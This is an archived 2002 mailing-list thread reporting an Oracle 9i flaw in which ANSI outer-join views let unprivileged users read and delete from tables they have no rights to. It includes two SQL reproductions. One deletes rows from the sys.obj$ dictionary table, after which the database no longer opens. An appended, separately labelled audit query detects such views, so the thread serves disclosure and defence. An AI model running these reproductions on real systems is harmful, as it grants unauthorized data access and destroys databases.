
Re: 9iDB Security Hole?

From: Howard Rogers <Howard.Rogers_at_oracle.com>
Date: Tue, 16 Apr 2002 16:42:53 +1000
Message-ID: <3CBBC7ED.5CC5241B@oracle.com>


This actually affects 9i on all platforms. Any use of the new ANSI join syntax will encounter it, but the old join syntax is immune.

Don't try this at home without adult supervision:

SQL> create user fred identified by blah;
SQL> grant create session, create view to fred;
SQL> connect fred/blah

Connected.
SQL> create view blowup as
  2 select a.obj# from sys.obj$ a
  3 left outer join sys.obj$ b
  4 on a.obj#=b.obj#;

View created.

SQL> delete from blowup;

Now reconnect as SYS, and do a shutdown followed by a startup, and see what happens.

Here's a clue from my alert.log:

Errors in file C:\oracle\admin\HJR9\udump\ORA01244.TRC:

ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [16513], [1403], [50], [], [], [], [], []

Tue Apr 16 16:39:41 2002
Error 704 happened during db open, shutting down database

Regards
HJR

"Vladimir M. Zakharychev" wrote:

> Anyone with 9i can confirm this?
>
> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> ...relcom.comp.dbms.oracle
>
> connect system/****@database
> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> Grant Create Session To us1;
> Grant Create Session To us2;
> Grant Create Table To us1;
> grant unlimited tablespace to us1;
> Grant Create View To us2;
>
> Connect us1/us11@database;
> Create Table t1(c1 Number(1));
> Insert Into t1(c1) Values(9);
> Create Table t2(c1 Number(1));
> Insert Into t2(c1) Values(9);
>
> commit;
> Connect us2/us12@database;
>
> SQL> Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- this is expected
> SQL> Select * From us1.t2;
> ORA-00942: table or view does not exist
> -- this one too
> SQL> Create View aa As Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- and this one
> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
>
> View created
> -- now this one is NOT !!!!!
> SQL> select * from aa;
>
> T1_C1 T2_C1
> ---- ----
> 9 9
>
> This effectively means that LEFT OUTER JOIN allows one to create views
> on tables that are normally not visible (provided that the unprivileged user
> knows table and column names).
> If you can confirm this basic example, can you also try it on system
> catalog tables/views? If you cannot confirm, please specify your version
> and platform so that we know which ones are not affected (poster didn't
> specify version, but I suggest it's 9.0.1.1 on either NT or Linux).
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.


Received on Tue Apr 16 2002 - 01:42:53 CDT
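
An audit query for the condition shown in this thread, added here as an example and not part of either poster's message: it lists views that reference a table or view in another schema although the view owner holds no directly granted privilege that would normally be required. It assumes that views created through the ANSI join syntax are still recorded in DBA_DEPENDENCIES and that O7_DICTIONARY_ACCESSIBILITY is FALSE; run against the thread's examples, it is meant to report the views AA and BLOWUP.

```sql
-- Added audit query (not from the thread). Run as a DBA.
-- Role grants are ignored on purpose: a view owner needs privileges on the
-- base objects granted directly (or to PUBLIC), not through a role.
SELECT d.owner            AS view_owner,
       d.name             AS view_name,
       d.referenced_owner AS base_owner,
       d.referenced_name  AS base_object
FROM   dba_dependencies d
WHERE  d.type = 'VIEW'
AND    d.referenced_type IN ('TABLE', 'VIEW')
AND    d.referenced_owner <> d.owner
AND    d.owner <> 'SYS'
-- No object privilege on the base object for the view owner or PUBLIC
AND    NOT EXISTS (
         SELECT 1
         FROM   dba_tab_privs p
         WHERE  p.owner      = d.referenced_owner
         AND    p.table_name = d.referenced_name
         AND    p.grantee IN (d.owner, 'PUBLIC')
         AND    p.privilege IN ('SELECT', 'INSERT', 'UPDATE', 'DELETE'))
-- No directly granted system privilege that covers the base object.
-- Assumption: with O7_DICTIONARY_ACCESSIBILITY = FALSE, SELECT ANY TABLE
-- does not reach SYS objects; SELECT ANY DICTIONARY does.
AND    NOT EXISTS (
         SELECT 1
         FROM   dba_sys_privs s
         WHERE  s.grantee = d.owner
         AND  ( (s.privilege = 'SELECT ANY TABLE'
                 AND d.referenced_owner <> 'SYS')
             OR (s.privilege = 'SELECT ANY DICTIONARY'
                 AND d.referenced_owner = 'SYS') ))
ORDER  BY d.owner, d.name;
```

Column-level grants (DBA_COL_PRIVS) are not considered, so a view that relies only on a column grant will appear in the result and needs a manual check.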
